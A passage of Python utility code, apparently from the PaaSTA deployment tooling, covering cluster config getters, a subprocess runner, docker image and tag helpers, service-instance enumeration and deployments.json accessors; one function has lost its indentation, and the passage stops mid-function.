    storage_classes = self.config_dict.get("supported_storage_classes", [])
    return storage_classes
def get_envoy_admin_endpoint_format(self) -> str:
    """Format string ({host}, {port}, {endpoint}) for Envoy's admin interface URL."""
    default_format = "http://{host:s}:{port:d}/{endpoint:s}"
    return self.config_dict.get("envoy_admin_endpoint_format", default_format)
def get_envoy_admin_port(self) -> int:
    """Port Envoy's admin interface listens on, resolved by looking the
    configured service name (default "envoy-admin") up in /etc/services."""
    service_name = self.config_dict.get("envoy_admin_domain_name", "envoy-admin")
    return socket.getservbyname(service_name)
def get_pdb_max_unavailable(self) -> Union[str, int]:
    """maxUnavailable value for PodDisruptionBudgets (int or percent string; default 0)."""
    max_unavailable = self.config_dict.get("pdb_max_unavailable", 0)
    return max_unavailable
def get_boost_regions(self) -> List[str]:
    """Regions the cluster boost applies to (empty list when unset)."""
    regions = self.config_dict.get("boost_regions", [])
    return regions
def get_pod_defaults(self) -> Dict[str, Any]:
    """Default settings applied to kubernetes pods (empty mapping when unset)."""
    defaults = self.config_dict.get("pod_defaults", {})
    return defaults
def get_ldap_search_base(self) -> str:
    """LDAP search base DN, or None when unconfigured."""
    search_base = self.config_dict.get("ldap_search_base", None)
    return search_base
def get_ldap_search_ou(self) -> str:
    """LDAP organizational unit to search, or None when unconfigured."""
    search_ou = self.config_dict.get("ldap_search_ou", None)
    return search_ou
def get_ldap_host(self) -> str:
    """Hostname of the LDAP server, or None when unconfigured."""
    host = self.config_dict.get("ldap_host", None)
    return host
def get_ldap_reader_username(self) -> str:
    """Username for the read-only LDAP bind, or None when unconfigured."""
    username = self.config_dict.get("ldap_reader_username", None)
    return username
def get_ldap_reader_password(self) -> str:
    """Password for the read-only LDAP bind, or None when unconfigured."""
    password = self.config_dict.get("ldap_reader_password", None)
    return password
def get_default_push_groups(self) -> List:
    """Default push groups, or None when unconfigured (note: not an empty list)."""
    push_groups = self.config_dict.get("default_push_groups", None)
    return push_groups
def get_git_config(self) -> Dict:
    """Git configuration: the git user plus per-repo git/deploy servers.

    Falls back to a default that only knows about yelpsoa-configs.
    """
    fallback = {
        "git_user": "git",
        "repos": {
            "yelpsoa-configs": {
                "repo_name": "yelpsoa-configs",
                "git_server": DEFAULT_SOA_CONFIGS_GIT_URL,
                "deploy_server": DEFAULT_SOA_CONFIGS_GIT_URL,
            },
        },
    }
    return self.config_dict.get("git_config", fallback)
def get_git_repo_config(self, repo_name: str) -> Dict:
    """Git configuration for one repo (empty mapping when the repo is unknown)."""
    repos = self.get_git_config().get("repos", {})
    return repos.get(repo_name, {})
def get_uwsgi_exporter_sidecar_image_url(self) -> str:
    """Docker image URL for the uwsgi_exporter sidecar container."""
    default_image = (
        "docker-paasta.yelpcorp.com:443/uwsgi_exporter-k8s-sidecar:v1.0.0-yelp2"
    )
    return self.config_dict.get("uwsgi_exporter_sidecar_image_url", default_image)
def default_should_run_uwsgi_exporter_sidecar(self) -> bool:
    """Cluster-wide default for running the uwsgi_exporter sidecar (default False)."""
    should_run = self.config_dict.get(
        "default_should_run_uwsgi_exporter_sidecar", False
    )
    return should_run
def get_mark_for_deployment_max_polling_threads(self) -> int:
    """Maximum polling threads used by mark-for-deployment (default 4)."""
    max_threads = self.config_dict.get("mark_for_deployment_max_polling_threads", 4)
    return max_threads
def get_mark_for_deployment_default_polling_interval(self) -> float:
    """Default polling interval (seconds) for mark-for-deployment (default 60)."""
    interval = self.config_dict.get(
        "mark_for_deployment_default_polling_interval", 60
    )
    return interval
def get_mark_for_deployment_default_diagnosis_interval(self) -> float:
    """Default diagnosis interval (seconds) for mark-for-deployment (default 60)."""
    interval = self.config_dict.get(
        "mark_for_deployment_default_diagnosis_interval", 60
    )
    return interval
def get_mark_for_deployment_default_time_before_first_diagnosis(self) -> float:
    """Seconds to wait after a deploy starts before the first diagnosis pass
    (default 300).

    Bug fix: the config key historically read here carried a doubled
    "default_default_" prefix, which does not match this method's name and
    looks like a typo. The correctly-spelled key now takes precedence, while
    the misspelled key is still honored so existing configs keep working.
    """
    value = self.config_dict.get(
        "mark_for_deployment_default_time_before_first_diagnosis"
    )
    if value is not None:
        return value
    # Backward compatibility with the historical (misspelled) key.
    return self.config_dict.get(
        "mark_for_deployment_default_default_time_before_first_diagnosis", 300
    )
def get_mark_for_deployment_should_ping_for_unhealthy_pods(self) -> bool:
    """Whether mark-for-deployment pings the author about unhealthy pods (default True)."""
    should_ping = self.config_dict.get(
        "mark_for_deployment_should_ping_for_unhealthy_pods", True
    )
    return should_ping
def _run(
command: Union[str, List[str]],
env: Mapping[str, str] = os.environ,
timeout: float = None,
log: bool = False,
stream: bool = False,
stdin: Any = None,
stdin_interrupt: bool = False,
popen_kwargs: Dict = {},
**kwargs: Any,
) -> Tuple[int, str]:
"""Given a command, run it. Return a tuple of the return code and any
output.
:param timeout: If specified, the command will be terminated after timeout
seconds.
:param log: If True, the _log will be handled by _run. If set, it is mandatory
to pass at least a :service: and a :component: parameter. Optionally you
can pass :cluster:, :instance: and :loglevel: parameters for logging.
We wanted to use plumbum instead of rolling our own thing with
subprocess.Popen but were blocked by
https://github.com/tomerfiliba/plumbum/issues/162 and our local BASH_FUNC
magic.
"""
output: List[str] = []
if log:
service = kwargs["service"]
component = kwargs["component"]
cluster = kwargs.get("cluster", ANY_CLUSTER)
instance = kwargs.get("instance", ANY_INSTANCE)
loglevel = kwargs.get("loglevel", DEFAULT_LOGLEVEL)
try:
if not isinstance(command, list):
command = shlex.split(command)
popen_kwargs["stdout"] = PIPE
popen_kwargs["stderr"] = STDOUT
popen_kwargs["stdin"] = stdin
popen_kwargs["env"] = env
process = Popen(command, **popen_kwargs)
if stdin_interrupt:
def signal_handler(signum: int, frame: FrameType) -> None:
process.stdin.write("\n".encode("utf-8"))
process.stdin.flush()
process.wait()
signal.signal(signal.SIGINT, signal_handler)
signal.signal(signal.SIGTERM, signal_handler)
# start the timer if we specified a timeout
if timeout:
proctimer = threading.Timer(timeout, _timeout, [process])
proctimer.start()
outfn: Any = print if stream else output.append
for linebytes in iter(process.stdout.readline, b""):
line = linebytes.decode("utf-8", errors="replace").rstrip("\n")
outfn(line)
if log:
_log(
service=service,
line=line,
component=component,
level=loglevel,
cluster=cluster,
instance=instance,
)
# when finished, get the exit code
process.wait()
returncode = process.returncode
except OSError as e:
if log:
_log(
service=service,
line=e.strerror.rstrip("\n"),
component=component,
level=loglevel,
cluster=cluster,
instance=instance,
)
output.append(e.strerror.rstrip("\n"))
returncode = e.errno
except (KeyboardInterrupt, SystemExit):
# need to clean up the timing thread here
if timeout:
proctimer.cancel()
raise
else:
# Stop the timer
if timeout:
proctimer.cancel()
if returncode == -9:
output.append(f"Command '{command}' timed out (longer than {timeout}s)")
return returncode, "\n".join(output)
def get_umask() -> int:
    """Return the current umask of this process without changing it.

    NOT THREAD SAFE: os.umask can only read by also writing, so the value is
    briefly replaced and then restored.
    """
    previous = os.umask(0o0022)
    os.umask(previous)
    return previous
def get_user_agent() -> str:
    """Build a user-agent string identifying this process and paasta version.

    Returns "<argv tail> <version>" under gunicorn, "<basename argv[0]>
    <version>" normally, and a generic "PaaSTA Tools <version>" when argv is
    empty (embedded interpreters).

    Bug fix: the original indexed ``sys.argv[0]`` before checking
    ``len(sys.argv) >= 1``, so the empty-argv fallback branch was unreachable
    and an empty argv raised IndexError instead. Guard first.
    """
    if len(sys.argv) < 1:
        return f"PaaSTA Tools {paasta_tools.__version__}"
    base_name = os.path.basename(sys.argv[0])
    if base_name == "gunicorn":
        return f"{sys.argv[-1]} {paasta_tools.__version__}"
    return f"{base_name} {paasta_tools.__version__}"
@contextlib.contextmanager
def atomic_file_write(target_path: str) -> Iterator[IO]:
    """Yield a writable file whose contents replace ``target_path`` atomically.

    Writes go to a hidden NamedTemporaryFile created in the same directory
    (same filesystem, so the final os.rename is atomic on POSIX). On clean
    exit the temp file is chmodded to the umask-derived mode (tempfiles are
    created 0o600) and renamed over the target. Passing "-" yields
    sys.stdout instead and performs no file operations.

    NOTE(review): if the body raises, the hidden temp file is left behind in
    the target directory — presumably acceptable; confirm before reuse.
    """
    dirname = os.path.dirname(target_path)
    basename = os.path.basename(target_path)
    if target_path == "-":
        yield sys.stdout
    else:
        with tempfile.NamedTemporaryFile(
            dir=dirname, prefix=(".%s-" % basename), delete=False, mode="w"
        ) as f:
            temp_target_path = f.name
            yield f
        # Re-apply the process umask so the result looks like a normally
        # created file rather than a 0o600 tempfile.
        mode = 0o0666 & (~get_umask())
        os.chmod(temp_target_path, mode)
        os.rename(temp_target_path, target_path)
class InvalidJobNameError(Exception):
    """Raised when a job/app id (or its parts) cannot be composed or decomposed."""

    pass
def compose_job_id(
    name: str,
    instance: str,
    git_hash: Optional[str] = None,
    config_hash: Optional[str] = None,
    spacer: str = SPACER,
) -> str:
    """Compose a job/app id by joining name, instance, and optional hashes.

    :param name: The name of the service
    :param instance: The instance of the service
    :param git_hash: The git_hash portion of the job_id. If git_hash is set,
        config_hash must also be set.
    :param config_hash: The config_hash portion of the job_id. If config_hash
        is set, git_hash must also be set.
    :returns: <name><SPACER><instance>, extended with <git_hash><SPACER>
        <config_hash> when both hashes are provided.
    :raises InvalidJobNameError: if exactly one of the hashes is provided.
    """
    parts = [name, instance]
    if git_hash and config_hash:
        parts.append(git_hash)
        parts.append(config_hash)
    elif git_hash or config_hash:
        raise InvalidJobNameError(
            "invalid job id because git_hash (%s) and config_hash (%s) must "
            "both be defined or neither can be defined" % (git_hash, config_hash)
        )
    return spacer.join(parts)
def decompose_job_id(job_id: str, spacer: str = SPACER) -> Tuple[str, str, str, str]:
    """Split a composed job id back into (service, instance, git hash, config hash).

    :param job_id: The composed id of the job/app
    :returns: a 4-tuple; the hash slots are None for 2-part ids.
    :raises InvalidJobNameError: when the id has neither 2 nor 4 parts.
    """
    pieces = job_id.split(spacer)
    if len(pieces) == 2:
        return (pieces[0], pieces[1], None, None)
    if len(pieces) == 4:
        return (pieces[0], pieces[1], pieces[2], pieces[3])
    raise InvalidJobNameError("invalid job id %s" % job_id)
def build_docker_image_name(service: str) -> str:
    """Build the registry-qualified docker image name for a service.

    docker-paasta.yelpcorp.com:443 is the URL for the Registry where PaaSTA
    will look for your images.

    :returns: a sanitized-for-Jenkins (s,/,-,g) version of the service's path
        in git, e.g. github.yelpcorp.com:services/foo becomes
        docker_registry/services-foo.
    """
    registry = get_service_docker_registry(service)
    return f"{registry}/services-{service}"
def build_docker_tag(service: str, upstream_git_commit: str) -> str:
    """Build the DOCKER_TAG string for a service at a given commit.

    upstream_git_commit is the SHA being built — usually the tip of
    origin/master.
    """
    image_name = build_docker_image_name(service)
    return f"{image_name}:paasta-{upstream_git_commit}"
def check_docker_image(service: str, tag: str) -> bool:
    """Checks whether the given image for :service: with :tag: exists.

    Queries the local docker daemon's image list for the service's image name
    and matches the full paasta tag against each image's RepoTags.

    :raises: ValueError if more than one docker image with :tag: found.
    :returns: True if there is exactly one matching image found.
    """
    docker_client = get_docker_client()
    image_name = build_docker_image_name(service)
    docker_tag = build_docker_tag(service, tag)
    images = docker_client.images(name=image_name)
    # image['RepoTags'] may be None
    # Fixed upstream but only in docker-py 2.
    # https://github.com/docker/docker-py/issues/1401
    result = [image for image in images if docker_tag in (image["RepoTags"] or [])]
    if len(result) > 1:
        raise ValueError(
            f"More than one docker image found with tag {docker_tag}\n{result}"
        )
    return len(result) == 1
def datetime_from_utc_to_local(utc_datetime: datetime.datetime) -> datetime.datetime:
    """Convert a naive UTC datetime to a naive datetime in this machine's local zone."""
    return datetime_convert_timezone(
        utc_datetime, dateutil.tz.tzutc(), dateutil.tz.tzlocal()
    )
def datetime_convert_timezone(
    dt: datetime.datetime, from_zone: datetime.tzinfo, to_zone: datetime.tzinfo
) -> datetime.datetime:
    """Reinterpret naive *dt* as being in *from_zone*, convert it to *to_zone*,
    and return the result stripped back to a naive datetime."""
    aware = dt.replace(tzinfo=from_zone)
    converted = aware.astimezone(to_zone)
    return converted.replace(tzinfo=None)
def get_username() -> str:
    """Return the current username portably, preferring $SUDO_USER when set.

    http://stackoverflow.com/a/2899055
    """
    sudo_user = os.environ.get("SUDO_USER")
    if sudo_user is not None:
        return sudo_user
    return pwd.getpwuid(os.getuid())[0]
def get_hostname() -> str:
    """Return the fully-qualified domain name of the machine running this code."""
    fqdn = socket.getfqdn()
    return fqdn
def get_soa_cluster_deploy_files(
    service: str = None, soa_dir: str = DEFAULT_SOA_DIR, instance_type: str = None
) -> Iterator[Tuple[str, str]]:
    """Yield (cluster, yaml_path) for every per-cluster instance-type yaml file.

    Scans ``<soa_dir>/<service>/*.yaml`` (all services when *service* is None)
    and yields files matching ``<instance_type>-<cluster>.yaml`` for known
    clusters; *instance_type* restricts to one type when it is valid.
    """
    if service is None:
        service = "*"
    service_path = os.path.join(soa_dir, service)
    valid_clusters = "|".join(load_system_paasta_config().get_clusters())
    if instance_type in INSTANCE_TYPES:
        type_alternatives = instance_type
    else:
        type_alternatives = "|".join(INSTANCE_TYPES)
    search_re = r"/.*/(" + type_alternatives + r")-(" + valid_clusters + r")\.yaml$"
    for yaml_file in glob.glob("%s/*.yaml" % service_path):
        try:
            # Opening verifies the file is readable before we report it.
            with open(yaml_file):
                match = re.search(search_re, yaml_file)
                if match is not None:
                    yield (match.group(2), yaml_file)
        except IOError as err:
            print(f"Error opening {yaml_file}: {err}")
def list_clusters(
    service: str = None, soa_dir: str = DEFAULT_SOA_DIR, instance_type: str = None
) -> List[str]:
    """Return a sorted list of clusters a service is configured to deploy to,
    or all clusters if ``service`` is not specified.

    Includes every cluster with a ``marathon-*.yaml`` or ``tron-*.yaml`` file.

    :param service: The service name. If unspecified, clusters running any
        service will be included.
    :returns: A sorted list of cluster names
    """
    seen = {
        cluster
        for cluster, _ in get_soa_cluster_deploy_files(
            service=service, soa_dir=soa_dir, instance_type=instance_type
        )
    }
    return sorted(seen)
def list_all_instances_for_service(
    service: str,
    clusters: Iterable[str] = None,
    instance_type: str = None,
    soa_dir: str = DEFAULT_SOA_DIR,
    cache: bool = True,
) -> Set[str]:
    """Collect every instance name defined for a service across clusters.

    :param clusters: clusters to inspect (defaults to every cluster the
        service deploys to)
    :param cache: use the time-cached instance listing when True
    """
    if not clusters:
        clusters = list_clusters(service, soa_dir=soa_dir)
    lookup = get_service_instance_list if cache else get_service_instance_list_no_cache
    instances = set()
    for cluster in clusters:
        for _, instance in lookup(service, cluster, instance_type, soa_dir=soa_dir):
            instances.add(instance)
    return instances
def filter_templates_from_config(config: Dict) -> Dict[str, Any]:
    """Drop yaml template anchors (keys starting with "_") from a config dict."""
    filtered = {}
    for key, value in config.items():
        if not key.startswith("_"):
            filtered[key] = value
    return filtered or {}
def read_service_instance_names(
    service: str, instance_type: str, cluster: str, soa_dir: str
) -> Collection[Tuple[str, str]]:
    """Read (service, instance) pairs for one instance type in one cluster.

    Loads ``<instance_type>-<cluster>.yaml`` from the service's soa-configs
    (template anchors filtered out). For tron, every job expands to one entry
    per action named "<job>.<action>"; for other types each top-level key is
    an instance.
    """
    instance_list = []
    conf_file = f"{instance_type}-{cluster}"
    config = service_configuration_lib.read_extra_service_information(
        service, conf_file, soa_dir=soa_dir, deepcopy=False,
    )
    config = filter_templates_from_config(config)
    if instance_type == "tron":
        for job_name, job in config.items():
            action_names = list(job.get("actions", {}).keys())
            for name in action_names:
                instance = f"{job_name}.{name}"
                instance_list.append((service, instance))
    else:
        for instance in config:
            instance_list.append((service, instance))
    return instance_list
def get_pipeline_config(service: str, soa_dir: str = DEFAULT_SOA_DIR) -> List[Dict]:
    """Return the deploy pipeline steps from a service's configuration (empty when absent)."""
    service_configuration = read_service_configuration(service, soa_dir)
    deploy_section = service_configuration.get("deploy", {})
    return deploy_section.get("pipeline", [])
def get_pipeline_deploy_groups(
    service: str, soa_dir: str = DEFAULT_SOA_DIR
) -> List[str]:
    """Return the deploy-group steps of a service's pipeline (non-deploy steps excluded)."""
    return [
        step["step"]
        for step in get_pipeline_config(service, soa_dir)
        if is_deploy_step(step["step"])
    ]
def get_service_instance_list_no_cache(
    service: str,
    cluster: Optional[str] = None,
    instance_type: str = None,
    soa_dir: str = DEFAULT_SOA_DIR,
) -> List[Tuple[str, str]]:
    """Enumerate the instances defined for a service as a list of tuples.

    :param service: The service name
    :param cluster: The cluster to read the configuration for (defaults to the
        local cluster from system paasta config)
    :param instance_type: 'marathon', 'tron', or None (default) for both
    :param soa_dir: The SOA config directory to read from
    :returns: A list of (name, instance) tuples
    """
    if not cluster:
        cluster = load_system_paasta_config().get_cluster()
    if instance_type in INSTANCE_TYPES:
        types_to_read: Tuple[str, ...] = (instance_type,)
    else:
        types_to_read = INSTANCE_TYPES
    instance_list: List[Tuple[str, str]] = []
    for one_type in types_to_read:
        instance_list += read_service_instance_names(
            service=service, instance_type=one_type, cluster=cluster, soa_dir=soa_dir,
        )
    log.debug("Enumerated the following instances: %s", instance_list)
    return instance_list
@time_cache(ttl=5)
def get_service_instance_list(
    service: str,
    cluster: Optional[str] = None,
    instance_type: str = None,
    soa_dir: str = DEFAULT_SOA_DIR,
) -> List[Tuple[str, str]]:
    """Enumerate the instances defined for a service as a list of tuples.

    Thin, 5-second time-cached wrapper around
    get_service_instance_list_no_cache — results may be up to ttl stale.

    :param service: The service name
    :param cluster: The cluster to read the configuration for
    :param instance_type: The type of instances to examine: 'marathon', 'tron', or None (default) for both
    :param soa_dir: The SOA config directory to read from
    :returns: A list of tuples of (name, instance) for each instance defined for the service name
    """
    return get_service_instance_list_no_cache(
        service=service, cluster=cluster, instance_type=instance_type, soa_dir=soa_dir
    )
def get_services_for_cluster(
    cluster: str = None, instance_type: str = None, soa_dir: str = DEFAULT_SOA_DIR
) -> List[Tuple[str, str]]:
    """Retrieve all services and instances defined to run in a cluster.

    :param cluster: The cluster to read the configuration for (defaults to the
        local cluster)
    :param instance_type: 'marathon', 'tron', or None (default) for both
    :param soa_dir: The SOA config directory to read from
    :returns: A list of (service, instance) tuples
    """
    if not cluster:
        cluster = load_system_paasta_config().get_cluster()
    rootdir = os.path.abspath(soa_dir)
    log.debug(
        "Retrieving all service instance names from %s for cluster %s", rootdir, cluster
    )
    return [
        service_instance
        for srv_dir in os.listdir(rootdir)
        for service_instance in get_service_instance_list(
            srv_dir, cluster, instance_type, soa_dir
        )
    ]
def load_service_instance_configs(
    service: str, instance_type: str, cluster: str, soa_dir: str = DEFAULT_SOA_DIR,
) -> Dict[str, InstanceConfigDict]:
    """Load every instance config of one type for a service/cluster, merging
    user soa-configs over any auto-tuned defaults for the same instance."""
    conf_file = f"{instance_type}-{cluster}"
    user_configs = filter_templates_from_config(
        service_configuration_lib.read_extra_service_information(
            service, conf_file, soa_dir=soa_dir, deepcopy=False,
        )
    )
    auto_configs = load_service_instance_auto_configs(
        service, instance_type, cluster, soa_dir
    )
    return {
        instance_name: deep_merge_dictionaries(
            overrides=user_config, defaults=auto_configs.get(instance_name, {}),
        )
        for instance_name, user_config in user_configs.items()
    }
def load_service_instance_config(
    service: str,
    instance: str,
    instance_type: str,
    cluster: str,
    soa_dir: str = DEFAULT_SOA_DIR,
) -> InstanceConfigDict:
    """Load one instance's config, merging user soa-configs over auto-tuned values.

    :raises InvalidJobNameError: for instance names starting with "_"
        (reserved for yaml templates)
    :raises NoConfigurationForServiceError: when the instance is absent from
        the per-cluster yaml
    """
    if instance.startswith("_"):
        raise InvalidJobNameError(
            f"Unable to load {instance_type} config for {service}.{instance} as instance name starts with '_'"
        )
    conf_file = f"{instance_type}-{cluster}"

    # We pass deepcopy=False here and then do our own deepcopy of the subset of the data we actually care about. Without
    # this optimization, any code that calls load_service_instance_config for every instance in a yaml file is ~O(n^2).
    user_config = copy.deepcopy(
        service_configuration_lib.read_extra_service_information(
            service, conf_file, soa_dir=soa_dir, deepcopy=False
        ).get(instance)
    )
    if user_config is None:
        raise NoConfigurationForServiceError(
            f"{instance} not found in config file {soa_dir}/{service}/{conf_file}.yaml."
        )

    auto_config = load_service_instance_auto_configs(
        service, instance_type, cluster, soa_dir
    ).get(instance, {})
    return deep_merge_dictionaries(overrides=user_config, defaults=auto_config,)
def load_service_instance_auto_configs(
    service: str, instance_type: str, cluster: str, soa_dir: str = DEFAULT_SOA_DIR,
) -> Dict[str, Dict[str, Any]]:
    """Load auto-tuned configs for a service/cluster, or {} when the instance
    type is not enabled for auto config."""
    enabled_types = load_system_paasta_config().get_auto_config_instance_types_enabled()
    if not enabled_types.get(instance_type):
        return {}
    conf_file = f"{instance_type}-{cluster}"
    return service_configuration_lib.read_extra_service_information(
        service,
        f"{AUTO_SOACONFIG_SUBDIR}/{conf_file}",
        soa_dir=soa_dir,
        deepcopy=False,
    )
def get_docker_host() -> str:
    """Docker daemon endpoint, honoring $DOCKER_HOST (default: local unix socket)."""
    default_socket = "unix://var/run/docker.sock"
    return os.environ.get("DOCKER_HOST", default_socket)
def get_docker_client() -> Client:
    """Build a docker client from DOCKER_* environment variables, falling back
    to get_docker_host() when the environment does not supply a base_url."""
    client_opts = kwargs_from_env(assert_hostname=False)
    if "base_url" in client_opts:
        return Client(**client_opts)
    else:
        return Client(base_url=get_docker_host(), **client_opts)
def get_running_mesos_docker_containers() -> List[Dict]:
    """List the currently running docker containers launched by mesos
    (identified by "mesos-" in the container's first name)."""
    client = get_docker_client()
    mesos_containers = []
    for container in client.containers():
        if "mesos-" in container["Names"][0]:
            mesos_containers.append(container)
    return mesos_containers
class TimeoutError(Exception):
    """Raised by Timeout when the guarded block exceeds its time budget.

    NOTE(review): intentionally shadows the builtin TimeoutError within this
    module; kept for backward compatibility with existing callers.
    """

    pass
class Timeout:
    """Context manager raising TimeoutError after ``seconds`` via SIGALRM.

    From http://stackoverflow.com/questions/2281850/timeout-function-if-it-takes-too-long-to-finish

    Signal-based, so it only works in the main thread and on Unix; it is not
    reentrant, and a previously scheduled alarm is cancelled (only the
    previous *handler* is restored on exit).
    """

    def __init__(self, seconds: int = 1, error_message: str = "Timeout") -> None:
        self.seconds = seconds
        self.error_message = error_message

    def handle_timeout(self, signum: int, frame: FrameType) -> None:
        # SIGALRM handler: abort the guarded block.
        raise TimeoutError(self.error_message)

    def __enter__(self) -> None:
        # Install our handler, remembering the old one for restoration.
        self.old_handler = signal.signal(signal.SIGALRM, self.handle_timeout)
        signal.alarm(self.seconds)

    def __exit__(self, type: Any, value: Any, traceback: Any) -> None:
        signal.alarm(0)  # cancel any pending alarm
        signal.signal(signal.SIGALRM, self.old_handler)
def print_with_indent(line: str, indent: int = 2) -> None:
    """Print *line* prefixed with *indent* spaces."""
    prefix = " " * indent
    print(f"{prefix}{line}")
class NoDeploymentsAvailable(Exception):
    """Raised when deployments.json is missing or lacks the requested entry."""

    pass
# v1 deployments.json maps "<service>:paasta-<branch>" keys to branch dicts.
DeploymentsJsonV1Dict = Dict[str, BranchDictV1]
# Readability aliases used by the v2 deployments.json typed dicts.
DeployGroup = str
BranchName = str
class _DeploymentsJsonV2ControlsDict(TypedDict, total=False):
    """Per-branch deploy controls in v2 deployments.json (all keys optional)."""

    force_bounce: Optional[str]
    desired_state: str
class _DeploymentsJsonV2DeploymentsDict(TypedDict):
    """Per-deploy-group image info in v2 deployments.json."""

    docker_image: str
    git_sha: str
class DeploymentsJsonV2Dict(TypedDict):
    """The "v2" section of deployments.json: deployments keyed by deploy
    group, controls keyed by branch name."""

    deployments: Dict[DeployGroup, _DeploymentsJsonV2DeploymentsDict]
    controls: Dict[BranchName, _DeploymentsJsonV2ControlsDict]
class DeploymentsJsonDict(TypedDict):
    """Top-level shape of deployments.json (legacy v1 plus v2 sections)."""

    v1: DeploymentsJsonV1Dict
    v2: DeploymentsJsonV2Dict
class DeploymentsJsonV1:
    """Accessor over the legacy "v1" section of deployments.json."""

    def __init__(self, config_dict: DeploymentsJsonV1Dict) -> None:
        self.config_dict = config_dict

    def get_branch_dict(self, service: str, branch: str) -> BranchDictV1:
        """Look up the branch dict keyed "<service>:paasta-<branch>" (empty if absent)."""
        key = f"{service}:paasta-{branch}"
        return self.config_dict.get(key, {})

    def __eq__(self, other: Any) -> bool:
        if not isinstance(other, DeploymentsJsonV1):
            return False
        return other.config_dict == self.config_dict
class DeploymentsJsonV2:
    """Accessor over the "v2" section of deployments.json for one service."""

    def __init__(self, service: str, config_dict: DeploymentsJsonV2Dict) -> None:
        self.config_dict = config_dict
        self.service = service

    def get_branch_dict(
        self, service: str, branch: str, deploy_group: str
    ) -> BranchDictV2:
        """Assemble the branch dict for a branch: image/sha come from the
        deploy group's deployment entry, state/bounce from branch controls."""
        full_branch = f"{service}:{branch}"
        branch_dict: BranchDictV2 = {
            "docker_image": self.get_docker_image_for_deploy_group(deploy_group),
            "git_sha": self.get_git_sha_for_deploy_group(deploy_group),
            "desired_state": self.get_desired_state_for_branch(full_branch),
            "force_bounce": self.get_force_bounce_for_branch(full_branch),
        }
        return branch_dict

    def get_deploy_groups(self) -> Collection[str]:
        """All deploy groups present in the deployments section."""
        return self.config_dict["deployments"].keys()

    def get_docker_image_for_deploy_group(self, deploy_group: str) -> str:
        """Docker image deployed for *deploy_group*.

        :raises NoDeploymentsAvailable: if the group has no deployment entry
        """
        try:
            return self.config_dict["deployments"][deploy_group]["docker_image"]
        except KeyError:
            e = f"{self.service} not deployed to {deploy_group}. Has mark-for-deployment been run?"
            raise NoDeploymentsAvailable(e)

    def get_git_sha_for_deploy_group(self, deploy_group: str) -> str:
        """Git sha deployed for *deploy_group*.

        :raises NoDeploymentsAvailable: if the group has no deployment entry
        """
        try:
            return self.config_dict["deployments"][deploy_group]["git_sha"]
        except KeyError:
            e = f"{self.service} not deployed to {deploy_group}. Has mark-for-deployment been run?"
            raise NoDeploymentsAvailable(e)

    def get_desired_state_for_branch(self, control_branch: str) -> str:
        """Desired state for a control branch (default "start" when the branch
        exists but has no explicit state).

        :raises NoDeploymentsAvailable: if the branch has no controls entry
        """
        try:
            return self.config_dict["controls"][control_branch].get(
                "desired_state", "start"
            )
        except KeyError:
            e = f"{self.service} not configured for {control_branch}. Has mark-for-deployment been run?"
            raise NoDeploymentsAvailable(e)

    def get_force_bounce_for_branch(self, control_branch: str) -> Optional[str]:
        """Force-bounce token for a control branch, or None when unset.

        (Annotation corrected to Optional[str]: the lookup defaults to None.)

        :raises NoDeploymentsAvailable: if the branch has no controls entry
        """
        try:
            return self.config_dict["controls"][control_branch].get(
                "force_bounce", None
            )
        except KeyError:
            e = f"{self.service} not configured for {control_branch}. Has mark-for-deployment been run?"
            raise NoDeploymentsAvailable(e)
def load_deployments_json(service: str, soa_dir: str = DEFAULT_SOA_DIR) -> Any:
    """Load a service's deployments.json, preferring the legacy v1 schema.

    :returns: DeploymentsJsonV1 when a "v1" section exists, else DeploymentsJsonV2
    :raises NoDeploymentsAvailable: when the file does not exist
    """
    deployment_file = os.path.join(soa_dir, service, "deployments.json")
    if not os.path.isfile(deployment_file):
        raise NoDeploymentsAvailable(
            f"{deployment_file} was not found. 'generate_deployments_for_service --service {service}' must be run first"
        )
    with open(deployment_file) as f:
        config_dict = json.load(f)
    if "v1" in config_dict:
        return DeploymentsJsonV1(config_dict["v1"])
    return DeploymentsJsonV2(service=service, config_dict=config_dict["v2"])
def load_v2_deployments_json(
    service: str, soa_dir: str = DEFAULT_SOA_DIR
) -> DeploymentsJsonV2:
    """Load the v2 section of a service's deployments.json.

    :raises NoDeploymentsAvailable: when the file does not exist
    """
    deployment_file = os.path.join(soa_dir, service, "deployments.json")
    if not os.path.isfile(deployment_file):
        raise NoDeploymentsAvailable(
            f"{deployment_file} was not found. 'generate_deployments_for_service --service {service}' must be run first"
        )
    with open(deployment_file) as f:
        return DeploymentsJsonV2(service=service, config_dict=json.load(f)["v2"])
def get_paasta_branch(cluster: str, instance: str) -> str:
    """Compose the paasta branch name "<cluster><SPACER><instance>"."""
    return f"{cluster}{SPACER}{instance}"
def parse_timestamp(tstamp: str) -> datetime.datetime:
    """Parse a compact paasta timestamp ("%Y%m%dT%H%M%S") into a naive datetime."""
    fmt = "%Y%m%dT%H%M%S"
    return datetime.datetime.strptime(tstamp, fmt)
def format_timestamp(dt: datetime.datetime = None) -> str:
    """Format *dt* (default: current UTC time) as compact "%Y%m%dT%H%M%S"."""
    when = datetime.datetime.utcnow() if dt is None else dt
    return when.strftime("%Y%m%dT%H%M%S")
def get_paasta_tag_from_deploy_group(identifier: str, desired_state: str) -> str:
    """Build a "paasta-<deploy_group>-<utc timestamp>-<state>" git tag name."""
    now = format_timestamp(datetime.datetime.utcnow())
    return "-".join(["paasta", identifier, now, desired_state])
def get_paasta_tag(cluster: str, instance: str, desired_state: str) -> str:
    """Build a "paasta-<cluster>.<instance>-<utc timestamp>-<state>" git tag name."""
    now = format_timestamp(datetime.datetime.utcnow())
    return f"paasta-{cluster}.{instance}-{now}-{desired_state}"
def format_tag(tag: str) -> str:
    """Qualify a bare tag name into a full git ref ("refs/tags/<tag>")."""
    return f"refs/tags/{tag}"
class NoDockerImageError(Exception):
    """Raised when no docker image can be found for a service/deploy group."""

    pass
def get_config_hash(config: Any, force_bounce: str = None) -> str:
    """Create a short MD5 hash of a configuration to be sent to Marathon —
    or anything really, so long as str(config) works.

    :param config: The configuration to hash (must be json-serializable)
    :param force_bounce: a timestamp (string) appended before hashing, usable
        to force a hash change
    :returns: "config" plus the first 8 hex digits of the MD5 of the
        sorted-key json dump
    """
    digest = hashlib.md5()
    payload = json.dumps(config, sort_keys=True) + (force_bounce or "")
    digest.update(payload.encode("UTF-8"))
    return f"config{digest.hexdigest()[:8]}"
def get_git_sha_from_dockerurl(docker_url: str, long: bool = False) -> str:
    """Extract the git sha encoded in a docker image url.

    The sha is the last "-"-separated token of the url's final path segment;
    it is truncated to 8 characters unless *long* is True.
    """
    final_segment = docker_url.split("/")[-1]
